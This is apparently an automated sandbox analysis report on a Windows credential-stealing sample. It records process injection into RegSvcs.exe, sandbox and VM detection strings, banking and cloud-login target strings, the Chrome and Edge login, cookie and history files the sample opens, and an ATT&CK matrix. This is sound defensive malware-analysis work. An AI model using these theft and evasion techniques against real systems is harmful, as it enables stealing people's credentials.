                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599125
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599015
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598906
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: RegSvcs.exe, 00000003.00000002.4584021509.0000000001276000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696487552s
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 6cicUo3f8g.exe, 00000000.00000003.2121444966.000000000151D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exebYZ7
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: toggeries.exe, 00000007.00000003.2310262940.0000000000C24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe
                Source: RegSvcs.exe, 00000008.00000002.4583833736.0000000000908000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD9548 LdrInitializeThunk,LdrInitializeThunk,8_2_05FD9548
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00953F09 BlockInput,0_2_00953F09
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008E3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008E3B3A
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00915A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00915A7C
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008E4B37 LoadLibraryA,GetProcAddress,0_2_008E4B37
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_01673558 mov eax, dword ptr fs:[00000030h]0_2_01673558
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_01674BB8 mov eax, dword ptr fs:[00000030h]0_2_01674BB8
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_01674C18 mov eax, dword ptr fs:[00000030h]0_2_01674C18
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00F654B8 mov eax, dword ptr fs:[00000030h]2_2_00F654B8
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00F66B78 mov eax, dword ptr fs:[00000030h]2_2_00F66B78
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00F66B18 mov eax, dword ptr fs:[00000030h]2_2_00F66B18
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 7_2_00C3F3D0 mov eax, dword ptr fs:[00000030h]7_2_00C3F3D0
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 7_2_00C40A90 mov eax, dword ptr fs:[00000030h]7_2_00C40A90
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 7_2_00C40A30 mov eax, dword ptr fs:[00000030h]7_2_00C40A30
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_009380A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_009380A9
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0090A124 SetUnhandledExceptionFilter,0_2_0090A124
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0090A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0090A155
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B0A124 SetUnhandledExceptionFilter,2_2_00B0A124
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B0A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00B0A155
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DB9008
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4EE008
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_009387B1 LogonUserW, 0_2_009387B1
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_008E3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_008E3B3A
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_008E48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_008E48D7
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_00944C27 mouse_event, 0_2_00944C27
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\6cicUo3f8g.exe"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Thebesian\toggeries.exe "C:\Users\user\AppData\Local\Thebesian\toggeries.exe"
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Thebesian\toggeries.exe"
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_00937CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00937CAF
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_0093874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_0093874B
                Source: 6cicUo3f8g.exe, toggeries.exe.0.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: 6cicUo3f8g.exe, toggeries.exe | Binary or memory string: Shell_TrayWnd
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_0090862B cpuid 0_2_0090862B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_00914E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00914E87
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_00921E06 GetUserNameW, 0_2_00921E06
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_00913F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00913F3A
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_008E49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_008E49A0
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: toggeries.exe PID: 5916, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1672, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: toggeries.exe PID: 2184, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7076, type: MEMORYSTR
                Source: Yara match | File source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: toggeries.exe PID: 5916, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1672, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: toggeries.exe PID: 2184, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: toggeries.exe | Binary or memory string: WIN_81
                Source: toggeries.exe | Binary or memory string: WIN_XP
                Source: toggeries.exe | Binary or memory string: WIN_XPe
                Source: toggeries.exe | Binary or memory string: WIN_VISTA
                Source: toggeries.exe | Binary or memory string: WIN_7
                Source: toggeries.exe | Binary or memory string: WIN_8
                Source: toggeries.exe.0.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                Source: Yara match | File source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: toggeries.exe PID: 5916, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1672, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: toggeries.exe PID: 2184, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7076, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: toggeries.exe PID: 5916, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1672, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: toggeries.exe PID: 2184, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7076, type: MEMORYSTR
                Source: Yara match | File source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: toggeries.exe PID: 5916, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1672, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: toggeries.exe PID: 2184, type: MEMORYSTR
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_00956283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00956283
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_00956747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00956747
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B56283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 2_2_00B56283
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B56747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 2_2_00B56747
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting
                2
                Valid Accounts
                2
                Native API
                111
                Scripting
                1
                Exploitation for Privilege Escalation
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                4
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Valid Accounts
                2
                Valid Accounts
                3
                Obfuscated Files or Information
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron2
                Registry Run Keys / Startup Folder
                21
                Access Token Manipulation
                1
                DLL Side-Loading
                NTDS127
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                Process Injection
                1
                Masquerading
                LSA Secrets231
                Security Software Discovery
                SSH3
                Clipboard Data
                14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                Registry Run Keys / Startup Folder
                2
                Valid Accounts
                Cached Domain Credentials11
                Virtualization/Sandbox Evasion
